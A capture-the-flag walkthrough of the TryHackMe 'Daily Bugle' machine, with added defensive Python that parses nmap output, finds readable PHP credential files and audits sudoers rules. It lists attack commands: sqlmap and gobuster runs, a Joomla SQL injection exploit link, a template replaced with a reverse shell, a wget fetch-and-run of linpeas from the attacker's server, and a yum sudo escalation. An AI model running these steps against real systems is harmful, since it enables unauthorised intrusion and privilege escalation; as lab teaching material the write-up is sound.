Daily Bugle Write-up
Hello fellow hacker, today I'm going to help you solve the machine Daily Bugle on TryHackMe:- https://tryhackme.com/room/dailybugle
So let's begin.
The main objectives of this machine are to:-
- Compromise the Joomla CMS via a SQL injection vulnerability
- Crack a password hash using a tool called John the Ripper
- Take advantage of a binary called 'yum' that allows for privilege escalation
# First step: we begin by running an nmap scan against the target machine:-
nmap -sC -sV <target-machine-IP> -oN nmapscans
-sC :- this flag runs the default script scan against the target machine
-sV :- this flag detects the services running on the machine and their versions
-oN :- this flag saves the result to a file (here nmapscans) for future reading.
PORT STATE SERVICE
------------------------------------------
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
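The scan above saves its result with -oN in nmap's "normal" text format. As an added example (not part of the original write-up), the following Python parses that format into structured port records and flags open services, such as the MySQL listener on 3306, that should not be reachable from the scanning host. The sample output, its version strings and the list of network-sensitive services are constructed for the example, not copied from the real scan.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap "normal" (-oN) output; these are not the
# write-up's real scan results and the version strings are illustrative.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated as: nmap -sC -sV -oN nmapscans 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6
3306/tcp open  mysql   MariaDB (unauthorized)
# Nmap done -- 1 IP address (1 host up) scanned in 30.00 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass
class Port:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text):
    """Extract the port table from nmap -oN output into Port records."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append(Port(int(m["port"]), m["proto"], m["state"],
                              m["service"], (m["version"] or "").strip()))
    return ports


# Services a defender would not expect to see reachable from an untrusted
# network; a database listener next to a web server is a classic finding.
# Illustrative list, constructed for this example.
NETWORK_SENSITIVE_SERVICES = {"mysql", "postgresql", "ms-sql-s", "redis", "mongodb"}


def exposed_service_findings(ports):
    """Return one finding string per open, network-sensitive service."""
    return [
        f"{p.port}/{p.proto}: {p.service} is reachable from the scanning host; "
        f"bind it to localhost or restrict it with a firewall rule"
        for p in ports
        if p.state == "open" and p.service in NETWORK_SENSITIVE_SERVICES
    ]


if __name__ == "__main__":
    parsed = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    for p in parsed:
        print(f"{p.port}/{p.proto} {p.state} {p.service} {p.version}")
    for finding in exposed_service_findings(parsed):
        print("FINDING:", finding)
```

Run against the real nmapscans file, the same parser feeds a report or a ticket; on this box it would single out the MySQL service as something that has no business listening on the network interface.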
# Port 80 is open on this machine, which means it runs a web server, so let's give it a visit:-
There is a login form on the home page, which seems interesting, and it looks like we can test it for SQL injection.
So I used a tool called sqlmap to automate the SQL injection testing:-
sqlmap -u 'http://<target-IP>/index.php/component/users/?view=login&Itemid=101' --forms --batch
-u :- this flag specifies the URL we want to check for SQLi
--forms :- tells sqlmap to parse and test the forms found on that page, i.e. the login form
--batch :- this flag automatically answers 'yes' to all the questions sqlmap asks, so it runs without prompting.
So, from the looks of it, the login form on the home page does not seem vulnerable to SQL injection.
There must be another way in.
# Next step is usually to run a directory discovery scan.
So I'll use Gobuster to discover any interesting directories on the machine:-
gobuster dir -u http://<target-machine-IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
There seems to be an interesting /administrator page. Let's see what it holds.
The administrator page has the Joomla login form:-
# From snooping around a little on Google I found that this machine has Joomla 3.7.0 installed.
Now Joomla 3.7.0 has a particular SQL injection vulnerability, CVE-2017-8917.
This vulnerability is caused by a component in the Joomla 3.7.0 code called "com_fields".
You can read about this vulnerability in detail here:- https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
So by googling around on the internet I found a Python script that exploits this particular Joomla vulnerability:- https://github.com/stefanlucas/Exploit-Joomla
And voila!
We found the user jonah and a password hash for that user.
# The next step in the process is to crack the password hash; for this we will use a tool called John the Ripper.
Put the hash in a .txt file and use the following command:-
john <name of the file containing the hash> --wordlist=<wordlist location>
You can use a wordlist of your choice; if none is specified, John will use its default wordlist, which is also pretty good.
Looks like John has cracked the password for us. It also shows some information about the hash; in this case we were dealing with a bcrypt hash.
# Alright, so now we can log in to the Joomla CMS as user jonah.
Now we can play around in the CMS and work out how to get a reverse shell to access files on the target system.
On some manual enumeration, I found the templates/beez3 tab, which included .php files.
# I removed all the code from the index.php file and inserted the code for a reverse shell.
To execute this reverse shell, click on the "template review" button on the page.
Now we'll start a netcat listener on our machine on port 9001.
Looks like we got a hit and we have a shell.
# We are the user apache on this machine, and now we have to work our way up to escalate our privileges.
The next step is further enumerating the machine locally; always remember "enumeration is the key to hack".
# On visiting the /home directory I found out that this machine has a user called jjameson.
It seems we do not have permission to access the files that jjameson holds, hence we'll enumerate to find a password for this user.
On my machine (a friendly tip: start the server in the directory that has linpeas.sh):-
python3 -m http.server 8080
On the target machine, i.e. in our reverse shell:-
wget http://<your-machine-IP>:8080/linpeas.sh
chmod +x linpeas.sh (to make it executable)
Run linpeas (./linpeas.sh) and wait for it to display some juicy information.
Looks like linpeas found a password in a PHP configuration file:-
# I think we found the password for the user jjameson, so let's try switching user.
Yes, we are now logged in as jjameson and have found the user.txt flag.
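linpeas surfaced the password because the PHP configuration file was readable by the account we had, and the same password then worked for jjameson. The following Python is an added example (not from the write-up or from linpeas): it finds PHP files that contain credential assignments in the style of Joomla's configuration.php and reports those readable by every local user, showing the weak 0644 mode beside the corrected 0640. The file tree, the class layout and the placeholder password are constructed for the example.

```python
import os
import re
import stat
import tempfile

# Credential assignments as written in PHP config files such as Joomla's
# configuration.php:  public $password = '...';
CREDENTIAL_ASSIGNMENT = re.compile(
    r"\$(?P<name>password|passwd|secret|db_pass\w*)\s*=\s*['\"][^'\"]*['\"]",
    re.IGNORECASE,
)


def scan_php_config(path):
    """Credential field names in one PHP file and whether any local user can read it."""
    with open(path, "r", errors="replace") as f:
        names = sorted({m["name"].lower() for m in CREDENTIAL_ASSIGNMENT.finditer(f.read())})
    world_readable = bool(os.stat(path).st_mode & stat.S_IROTH)
    return {"path": path, "fields": names, "world_readable": world_readable}


def find_exposed_configs(root):
    """PHP files under root that hold credentials and are readable by everyone."""
    exposed = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".php"):
                result = scan_php_config(os.path.join(dirpath, name))
                if result["fields"] and result["world_readable"]:
                    exposed.append(result)
    return exposed


def demo():
    """Constructed Joomla-like tree: count exposures with the weak mode (0644),
    then again after the corrected mode (0640, owner plus web-server group)."""
    with tempfile.TemporaryDirectory() as root:
        cfg = os.path.join(root, "configuration.php")
        with open(cfg, "w") as f:
            f.write("<?php\nclass JConfig {\n"
                    "    public $user = 'joomla';\n"
                    "    public $password = 'PLACEHOLDER_DB_PASSWORD';\n"
                    "}\n")
        os.chmod(cfg, 0o644)   # weak: every local account can read the database password
        before = len(find_exposed_configs(root))
        os.chmod(cfg, 0o640)   # corrected: owner and the web-server group only
        after = len(find_exposed_configs(root))
        return before, after


if __name__ == "__main__":
    print("exposed configs before/after chmod:", demo())
```

The web-server account has to read this file, so tightening its mode does not hide the password from a shell that already runs as apache; what it does is keep every other local account out. The write-up's real lesson is the second one: the database password was reused for a system account, so one readable config file became a second user.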
# The next step is to escalate privileges to root.
I used the command sudo -l to check what commands the user jjameson can run on this machine:-
OK, so it looks like we can run the binary yum without requiring any password.
We'll now go to a website called GTFOBins (https://gtfobins.github.io/), which lists ways of abusing binaries like this to escalate our privileges to root with ease.
On following these steps, yum allowed us to get root privileges.
We can now grab the root.txt flag from /root/root.txt.
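The privilege escalation above relied on a sudoers rule that lets jjameson run yum without a password; yum is one of many binaries GTFOBins documents as able to break out to a shell. The following Python is an added example (not part of the write-up): it parses sudoers-style user specifications and flags rules that delegate shell-capable binaries, with or without NOPASSWD. The sudoers excerpt and the list of binaries are constructed for the example; the list is an illustrative subset, not GTFOBins' full catalogue.

```python
import re

# Constructed sudoers excerpt for the example; not the target machine's file.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root     ALL=(ALL)       ALL
%wheel   ALL=(ALL)       ALL
jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
deploy   ALL=(www-data) /usr/bin/systemctl restart httpd   # scoped, single command
"""

# Illustrative subset of binaries GTFOBins documents as able to spawn a
# shell or write arbitrary files when run with elevated privileges.
SHELL_CAPABLE = {"yum", "rsync", "vi", "vim", "less", "more", "find",
                 "python", "python3", "perl", "bash", "sh", "env", "awk"}

# user  hosts=(runas) [TAG:...] commands
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse user specification lines into dicts; Defaults lines, aliases
    and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append({"user": m["who"], "runas": m["runas"],
                      "tags": tags, "commands": cmds})
    return rules


def audit_sudoers(rules):
    """Return (user, command, reason) tuples for rules worth a second look."""
    findings = []
    for r in rules:
        nopasswd = "NOPASSWD" in r["tags"]
        for cmd in r["commands"]:
            if cmd == "ALL":
                if nopasswd:
                    findings.append((r["user"], cmd, "unrestricted sudo without a password"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                reason = "shell-capable binary (see GTFOBins)"
                if nopasswd:
                    reason += "; no password required"
                findings.append((r["user"], cmd, reason))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user}: {cmd} -> {reason}")
```

On the sample, jjameson's yum rule and backup's rsync rule are reported while deploy's single fixed systemctl command is not. A rule like jjameson's should be removed or replaced with a wrapper script the user cannot edit and that fixes every argument; GTFOBins is as useful to the auditor as to the attacker, because it tells you which binaries cannot safely be delegated at all.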